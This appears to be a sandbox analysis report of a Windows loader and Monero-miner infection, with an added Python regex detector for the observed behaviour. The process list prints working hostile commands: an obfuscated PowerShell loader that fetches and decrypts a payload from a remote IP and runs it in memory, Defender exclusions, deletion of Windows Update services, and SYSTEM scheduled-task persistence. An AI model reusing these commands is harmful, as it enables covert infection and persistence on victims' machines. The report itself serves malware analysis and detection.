C:\Users\Admin\AppData\Local\Temp\10180c8ca3\oneetx.exe
"C:\Users\Admin\AppData\Local\Temp\10180c8ca3\oneetx.exe"
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\Admin\AppData\Local\Temp\10180c8ca3\oneetx.exe" /F
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Users\Admin\AppData\Local\a5948247-5087-4f02-b4b2-8e34b6a1d297" /deny *S-1-1-0:(OI)(CI)(DE,DC)
C:\Users\Admin\AppData\Local\Temp\2B4C.exe
"C:\Users\Admin\AppData\Local\Temp\2B4C.exe" --Admin IsNotAutoStart IsNotTask
C:\Users\Admin\AppData\Local\Temp\4BE6.exe
C:\Users\Admin\AppData\Local\Temp\4BE6.exe
C:\Users\Admin\AppData\Local\Temp\4F90.exe
C:\Users\Admin\AppData\Local\Temp\4F90.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 864 -s 780
C:\Users\Admin\AppData\Local\Temp\54B2.exe
C:\Users\Admin\AppData\Local\Temp\54B2.exe
C:\Users\Admin\AppData\Local\Temp\2B4C.exe
"C:\Users\Admin\AppData\Local\Temp\2B4C.exe" --Admin IsNotAutoStart IsNotTask
C:\Users\Admin\AppData\Local\Temp\6126.exe
C:\Users\Admin\AppData\Local\Temp\6126.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -command if ([System.Environment]::GetEnvironmentVariables().Count -lt 10) {exit -65536;} $anemoneAccoast = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('OTEuMjE1Ljg1LjE5OA==')); $undoneBasalt = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('NTEwMTg=')); $urledAnemone = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('Y2IxYTM=')); $drollyAdopted = new-object System.Net.Sockets.TcpClient; $drollyAdopted.Connect($anemoneAccoast, [int]$undoneBasalt); $croodUndone = $drollyAdopted.GetStream(); $drollyAdopted.SendTimeout = 300000; $drollyAdopted.ReceiveTimeout = 300000; $anemoneUrled = [System.Text.StringBuilder]::new(); $anemoneUrled.AppendLine('GET /' + $urledAnemone); $anemoneUrled.AppendLine('Host: ' + $anemoneAccoast); $anemoneUrled.AppendLine(); $drollyBasalt = [System.Text.Encoding]::ASCII.GetBytes($anemoneUrled.ToString()); $croodUndone.Write($drollyBasalt, 0, $drollyBasalt.Length); $croodAnemone = New-Object System.IO.MemoryStream; $croodUndone.CopyTo($croodAnemone); $croodUndone.Dispose(); $drollyAdopted.Dispose(); $croodAnemone.Position = 0; $accoastAdopted = $croodAnemone.ToArray(); $croodAnemone.Dispose(); $adoptedUndone = [System.Text.Encoding]::ASCII.GetString($accoastAdopted).IndexOf('`r`n`r`n')+1; $urledDrolly = [System.Text.Encoding]::ASCII.GetString($accoastAdopted[$adoptedUndone..($accoastAdopted.Length-1)]); $urledDrolly = [System.Convert]::FromBase64String($urledDrolly); $adoptedTaipans = New-Object System.Security.Cryptography.AesManaged; $adoptedTaipans.Mode = [System.Security.Cryptography.CipherMode]::CBC; $adoptedTaipans.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7; $adoptedTaipans.Key = [System.Convert]::FromBase64String('REh1kjJGknER9Hy/8Kp1GmdthqGx+srHUlsWBbnCLIM='); $adoptedTaipans.IV = [System.Convert]::FromBase64String('biNlJbw5kJdQtvBXtmkf9A=='); $accoastBasalt = $adoptedTaipans.CreateDecryptor(); $urledDrolly = $accoastBasalt.TransformFinalBlock($urledDrolly, 0, $urledDrolly.Length); $accoastBasalt.Dispose(); $adoptedTaipans.Dispose(); $adoptedYttrium = New-Object System.IO.MemoryStream(, $urledDrolly); $urledAccoast = New-Object System.IO.MemoryStream; $yttriumTaipans = New-Object System.IO.Compression.GZipStream($adoptedYttrium, [IO.Compression.CompressionMode]::Decompress); $yttriumTaipans.CopyTo($urledAccoast); $urledDrolly = $urledAccoast.ToArray(); $anemoneBasalt = [System.Reflection.Assembly]::Load($urledDrolly); $yttriumDrolly = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('dW5uZXN0U2NvdXRlcg==')); $taipansAccoast = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('YmFzYWx0QWNjb2FzdA==')); $urledAdopted = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('dGFpcGFuc1l0dHJpdW0=')); $urledCrood = $anemoneBasalt.GetType($yttriumDrolly + '.' + $taipansAccoast); $drollyTaipans = $urledCrood.GetMethod($urledAdopted); $drollyTaipans.Invoke($undoneUrled, (, [string[]] (''))); #($undoneUrled, $undoneUrled);
C:\Windows\Microsoft.NET\assembly\GAC_32\MSBuild\v4.0_4.0.0.0__b03f5f7f11d50a3a\MSBuild.exe
"C:\Windows\Microsoft.NET\assembly\GAC_32\MSBuild\v4.0_4.0.0.0__b03f5f7f11d50a3a\MSBuild.exe"
C:\Users\Admin\AppData\Local\11c2e844-349e-431a-a3bc-85ace7a06f39\build2.exe
"C:\Users\Admin\AppData\Local\11c2e844-349e-431a-a3bc-85ace7a06f39\build2.exe"
C:\Users\Admin\AppData\Local\11c2e844-349e-431a-a3bc-85ace7a06f39\build3.exe
"C:\Users\Admin\AppData\Local\11c2e844-349e-431a-a3bc-85ace7a06f39\build3.exe"
C:\Windows\SysWOW64\schtasks.exe
/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
C:\Users\Admin\AppData\Local\11c2e844-349e-431a-a3bc-85ace7a06f39\build2.exe
"C:\Users\Admin\AppData\Local\11c2e844-349e-431a-a3bc-85ace7a06f39\build2.exe"
C:\Users\Admin\AppData\Local\Temp\10180c8ca3\oneetx.exe
C:\Users\Admin\AppData\Local\Temp\10180c8ca3\oneetx.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
C:\Windows\SysWOW64\schtasks.exe
/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
C:\Windows\Microsoft.NET/Framework/v4.0.30319/aspnet_compiler.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
C:\Windows\Microsoft.NET/Framework/v4.0.30319/aspnet_compiler.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 864 -s 788
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
C:\Windows\Microsoft.NET/Framework/v4.0.30319/aspnet_compiler.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
C:\Windows\Microsoft.NET/Framework/v4.0.30319/aspnet_compiler.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
C:\Windows\Microsoft.NET/Framework/v4.0.30319/aspnet_compiler.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3968 -s 716
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
C:\Windows\Microsoft.NET/Framework/v4.0.30319/aspnet_compiler.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
C:\Windows\Microsoft.NET/Framework/v4.0.30319/aspnet_compiler.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
C:\Windows\Microsoft.NET/Framework/v4.0.30319/aspnet_compiler.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
C:\Windows\Microsoft.NET/Framework/v4.0.30319/aspnet_compiler.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
C:\Windows\Microsoft.NET/Framework/v4.0.30319/aspnet_compiler.exe
C:\Users\Admin\AppData\Local\Temp\D415.exe
C:\Users\Admin\AppData\Local\Temp\D415.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Windows\explorer.exe
C:\Windows\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Windows\explorer.exe
C:\Windows\explorer.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wsyzqeupt#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'NoteUpdateTaskMachineQC' /tr '''C:\Program Files\Notepad\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Notepad\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'NoteUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "NoteUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Notepad\Chrome\updater.exe' }
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Windows\System32\sc.exe
sc stop UsoSvc
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
C:\Windows\System32\sc.exe
sc stop wuauserv
C:\Windows\System32\sc.exe
sc stop bits
C:\Windows\System32\sc.exe
sc stop dosvc
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
C:\Windows\explorer.exe
C:\Windows\explorer.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#iqegjinl#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "NoteUpdateTaskMachineQC" } Else { "C:\Program Files\Notepad\Chrome\updater.exe" }
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /run /tn NoteUpdateTaskMachineQC
C:\Program Files\Notepad\Chrome\updater.exe
"C:\Program Files\Notepad\Chrome\updater.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3168 -s 1824
C:\Users\Admin\AppData\Local\Temp\10180c8ca3\oneetx.exe
C:\Users\Admin\AppData\Local\Temp\10180c8ca3\oneetx.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wsyzqeupt#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'NoteUpdateTaskMachineQC' /tr '''C:\Program Files\Notepad\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Notepad\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'NoteUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "NoteUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Notepad\Chrome\updater.exe' }
C:\Windows\System32\sc.exe
sc stop UsoSvc
C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
C:\Windows\System32\sc.exe
sc stop wuauserv
C:\Windows\System32\sc.exe
sc stop bits
C:\Windows\System32\sc.exe
sc stop dosvc
C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe zuhwtyqtfkk
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
C:\Windows\System32\Wbem\WMIC.exe
wmic PATH Win32_VideoController GET Name, VideoProcessor
C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe ozascextlcafxrlv
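The process list above records, in order, how the dropped updater entrenches itself: `Add-MpPreference` excludes the whole user profile and Program Files from Defender, `sc stop` and `reg delete` remove the Windows Update, BITS and Delivery Optimization services, `powercfg` turns off sleep and hibernation, a task named NoteUpdateTaskMachineQC runs updater.exe as SYSTEM at startup, a separate every-minute task (Azure-Update-Task) launches mstsca.exe from AppData, `wmic` writes the GPU model to g.log, and `aspnet_compiler.exe` is launched with forward slashes in its path; the chain ends with the connections to xmr-eu1/xmr-eu2.nanopool.org in the network table below. The following is an added example for this report, not code from the sample or the sandbox: a small regex matcher run over constructed process-creation events whose command lines are copied (some shortened) from the list, one rule per behaviour, with an unrelated conhost.exe event as a control.

```python
"""Detection pass over the process-creation activity in this report.

Added example, not part of the report or of any vendor rule set: a regex
matcher run over constructed process-creation events whose command lines are
copied (some shortened) from the process list above. It flags what makes this
chain a loader/miner install: Defender path exclusions, Windows Update
services stopped and their service keys deleted, sleep and hibernate
disabled, a SYSTEM scheduled task registered from PowerShell, a task running
from AppData, GPU enumeration written to a log file, and a System32 binary
invoked with forward slashes in its path.
"""
import re
from typing import Dict, List, Set

# Constructed events; the "cmd" strings are command lines from the report.
EVENTS: List[Dict[str, object]] = [
    {"pid": 1, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference"
            r" -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force"},
    {"pid": 2, "image": r"C:\Windows\System32\cmd.exe",
     "cmd": r'C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv'
            r' & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f'
            r' & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f'},
    {"pid": 3, "image": r"C:\Windows\System32\cmd.exe",
     "cmd": r"C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -standby-timeout-dc 0"},
    {"pid": 4, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wsyzqeupt#> IF(...) { Register-ScheduledTask"
            r" -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Notepad\Chrome\updater.exe')"
            r" -TaskName 'NoteUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }"},
    {"pid": 5, "image": r"C:\Windows\SysWOW64\schtasks.exe",
     "cmd": r'/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"'},
    {"pid": 6, "image": r"C:\Windows\System32\cmd.exe",
     "cmd": r'C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"'},
    {"pid": 7, "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe",
     "cmd": r"C:\Windows\Microsoft.NET/Framework/v4.0.30319/aspnet_compiler.exe"},
    {"pid": 8, "image": r"C:\Windows\System32\conhost.exe",  # benign control event
     "cmd": r"C:\Windows\System32\conhost.exe zuhwtyqtfkk"},
]

# (rule name, label, pattern). ATT&CK IDs are the standard ones for each technique.
RULES = [
    ("defender_path_exclusion", "T1562.001 Impair Defenses",
     re.compile(r"Add-MpPreference\s+-ExclusionPath", re.I)),
    ("update_service_stopped", "T1489 Service Stop",
     re.compile(r"\bsc\s+stop\s+(UsoSvc|WaaSMedicSvc|wuauserv|bits|dosvc)\b", re.I)),
    ("update_service_key_deleted", "T1489 Service Stop",
     re.compile(r'reg\s+delete\s+"HKLM\\SYSTEM\\CurrentControlSet\\Services\\(UsoSvc|WaaSMedicSvc|wuauserv|bits|dosvc)"', re.I)),
    ("sleep_hibernate_disabled", "keeps the host awake for the miner",
     re.compile(r"powercfg\s+/x\s+-(hibernate|standby)-timeout-(ac|dc)\s+0", re.I)),
    ("schtask_registered_as_system", "T1053.005 Scheduled Task",
     re.compile(r"Register-ScheduledTask\b.*-User\s+'System'", re.I)),
    ("schtask_runs_from_appdata", "T1053.005 Scheduled Task",
     re.compile(r'/create\b.*/tr\s+"?[A-Z]:\\Users\\[^"]*\\AppData\\[^"]*', re.I)),
    ("gpu_enum_to_file", "T1082 System Information Discovery",
     re.compile(r"wmic\s+PATH\s+Win32_VideoController\b.*>", re.I)),
    ("forward_slash_system_path", "System32 path spelled with '/' separators",
     re.compile(r"[A-Z]:\\Windows\\\S*/\S*\.exe", re.I)),
]


def scan(events: List[Dict[str, object]]) -> List[Dict[str, object]]:
    """One hit per (event, rule) pair whose command line matches."""
    hits = []
    for ev in events:
        for name, label, rx in RULES:
            if rx.search(str(ev["cmd"])):
                hits.append({"pid": ev["pid"], "rule": name, "label": label, "image": ev["image"]})
    return hits


def triggered(events: List[Dict[str, object]]) -> Set[str]:
    """Names of the rules that fired at least once."""
    return {h["rule"] for h in scan(events)}


def pids_by_rule(events: List[Dict[str, object]], rule: str) -> List[int]:
    """Sorted PIDs whose command line matched the given rule."""
    return sorted({h["pid"] for h in scan(events) if h["rule"] == rule})


if __name__ == "__main__":
    for h in scan(EVENTS):
        print(f"pid {h['pid']:>2}  {h['rule']:<28} {h['label']}")
```

Each rule here is deliberately narrow, keyed to the exact services, switches and paths this sample used, so on real telemetry they should be read as a starting point: the Defender exclusion and the service-key deletion are the two that stay high-confidence outside this sample, while the `powercfg` and `wmic` rules are only meaningful in combination with the others, since both commands have ordinary administrative uses.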
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | potunulit.org | udp |
| US | 188.114.97.0:80 | potunulit.org | tcp |
| US | 8.8.8.8:53 | 0.97.114.188.in-addr.arpa | udp |
| US | 8.8.8.8:53 | leaderspro.ps | udp |
| PS | 109.73.242.14:443 | leaderspro.ps | tcp |
| DE | 45.9.74.80:80 | 45.9.74.80 | tcp |
| EE | 91.235.234.235:80 | | tcp |
| US | 8.8.8.8:53 | 14.242.73.109.in-addr.arpa | udp |
| US | 8.8.8.8:53 | t.me | udp |
| NL | 149.154.167.99:443 | t.me | tcp |
| US | 8.8.8.8:53 | 99.167.154.149.in-addr.arpa | udp |
| DE | 116.203.220.83:11111 | 116.203.220.83 | tcp |
| US | 20.189.173.7:443 | | tcp |
| US | 8.8.8.8:53 | 80.74.9.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 24.249.124.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 83.220.203.116.in-addr.arpa | udp |
| US | 82.117.255.127:80 | 82.117.255.127 | tcp |
| US | 8.8.8.8:53 | 127.255.117.82.in-addr.arpa | udp |
| US | 8.8.8.8:53 | bz.bbbeioaag.com | udp |
| HK | 103.100.211.218:80 | bz.bbbeioaag.com | tcp |
| US | 8.8.8.8:53 | 218.211.100.103.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 52.4.107.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.2ip.ua | udp |
| NL | 162.0.217.254:443 | api.2ip.ua | tcp |
| AT | 77.73.134.27:80 | 77.73.134.27 | tcp |
| US | 8.8.8.8:53 | 254.217.0.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 27.134.73.77.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 188.155.64.172.in-addr.arpa | udp |
| BE | 8.238.110.126:80 | | tcp |
| NL | 5.252.118.57:80 | 5.252.118.57 | tcp |
| US | 8.8.8.8:53 | 57.118.252.5.in-addr.arpa | udp |
| NL | 162.0.217.254:443 | api.2ip.ua | tcp |
| US | 8.8.8.8:53 | colisumy.com | udp |
| US | 8.8.8.8:53 | zexeq.com | udp |
| KR | 211.53.230.67:80 | zexeq.com | tcp |
| MX | 187.232.218.151:80 | colisumy.com | tcp |
| US | 8.8.8.8:53 | adsmanager.facebook.com | udp |
| US | 157.240.5.12:443 | adsmanager.facebook.com | tcp |
| US | 8.8.8.8:53 | www.facebook.com | udp |
| DE | 157.240.20.35:443 | www.facebook.com | tcp |
| US | 8.8.8.8:53 | 151.218.232.187.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.230.53.211.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 12.5.240.157.in-addr.arpa | udp |
| US | 8.8.8.8:53 | count.iiagjaggg.com | udp |
| HK | 154.221.31.191:80 | count.iiagjaggg.com | tcp |
| US | 8.8.8.8:53 | 35.20.240.157.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 191.31.221.154.in-addr.arpa | udp |
| KR | 211.53.230.67:80 | zexeq.com | tcp |
| US | 8.8.8.8:53 | 203.151.224.20.in-addr.arpa | udp |
| RU | 91.215.85.198:51018 | 91.215.85.198 | tcp |
| US | 8.8.8.8:53 | 198.85.215.91.in-addr.arpa | udp |
| US | 8.8.8.8:53 | aapu.at | udp |
| AR | 190.229.19.7:80 | aapu.at | tcp |
| AR | 190.229.19.7:80 | aapu.at | tcp |
| US | 8.8.8.8:53 | 7.19.229.190.in-addr.arpa | udp |
| CZ | 146.19.173.221:80 | 146.19.173.221 | tcp |
| AR | 190.229.19.7:80 | aapu.at | tcp |
| US | 8.8.8.8:53 | 221.173.19.146.in-addr.arpa | udp |
| AR | 190.229.19.7:80 | aapu.at | tcp |
| US | 8.8.8.8:53 | hoh0aeghwugh2gie.com | udp |
| N/A | 185.161.248.41:80 | hoh0aeghwugh2gie.com | tcp |
| US | 8.8.8.8:53 | 41.248.161.185.in-addr.arpa | udp |
| AR | 190.229.19.7:80 | aapu.at | tcp |
| AR | 190.229.19.7:80 | aapu.at | tcp |
| AR | 190.229.19.7:80 | aapu.at | tcp |
| AR | 190.229.19.7:80 | aapu.at | tcp |
| AR | 190.229.19.7:80 | aapu.at | tcp |
| AR | 190.229.19.7:80 | aapu.at | tcp |
| AR | 190.229.19.7:80 | aapu.at | tcp |
| AR | 190.229.19.7:80 | aapu.at | tcp |
| AR | 190.229.19.7:80 | aapu.at | tcp |
| US | 8.8.8.8:53 | janjackfrs.com | udp |
| RU | 45.143.137.122:80 | janjackfrs.com | tcp |
| AR | 190.229.19.7:80 | aapu.at | tcp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 122.137.143.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.ip.sb | udp |
| US | 104.26.13.31:443 | api.ip.sb | tcp |
| AR | 190.229.19.7:80 | aapu.at | tcp |
| US | 8.8.8.8:53 | 31.13.26.104.in-addr.arpa | udp |
| AR | 190.229.19.7:80 | aapu.at | tcp |
| AR | 190.229.19.7:80 | aapu.at | tcp |
| AR | 190.229.19.7:80 | aapu.at | tcp |
| AR | 190.229.19.7:80 | aapu.at | tcp |
| AR | 190.229.19.7:80 | aapu.at | tcp |
| AR | 190.229.19.7:80 | aapu.at | tcp |
| AR | 190.229.19.7:80 | aapu.at | tcp |
| AR | 190.229.19.7:80 | aapu.at | tcp |
| AR | 190.229.19.7:80 | aapu.at | tcp |
| AR | 190.229.19.7:80 | aapu.at | tcp |
| AR | 190.229.19.7:80 | aapu.at | tcp |
| AR | 190.229.19.7:80 | aapu.at | tcp |
| AR | 190.229.19.7:80 | aapu.at | tcp |
| AR | 190.229.19.7:80 | aapu.at | tcp |
| AR | 190.229.19.7:80 | aapu.at | tcp |
| AR | 190.229.19.7:80 | aapu.at | tcp |
| AR | 190.229.19.7:80 | aapu.at | tcp |
| AR | 190.229.19.7:80 | aapu.at | tcp |
| AR | 190.229.19.7:80 | aapu.at | tcp |
| US | 8.8.8.8:53 | xmr-eu2.nanopool.org | udp |
| FR | 92.222.217.165:14433 | xmr-eu2.nanopool.org | tcp |
| US | 8.8.8.8:53 | 165.217.222.92.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 104.20.68.143:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | xmr-eu1.nanopool.org | udp |
| NL | 51.15.69.136:14433 | xmr-eu1.nanopool.org | tcp |
| US | 8.8.8.8:53 | 143.68.20.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 136.69.15.51.in-addr.arpa | udp |
Files
memory/2424-122-0x00000000001D0000-0x00000000001D9000-memory.dmp
memory/3156-123-0x00000000005A0000-0x00000000005B6000-memory.dmp
memory/2424-124-0x0000000000400000-0x0000000002B91000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\918.exe
| MD5 | 6b20cecdd6ed336dacaf9a4427d9ccbe |
| SHA1 | 38c7528dbe7299637e34b199997d9d4479188cd5 |
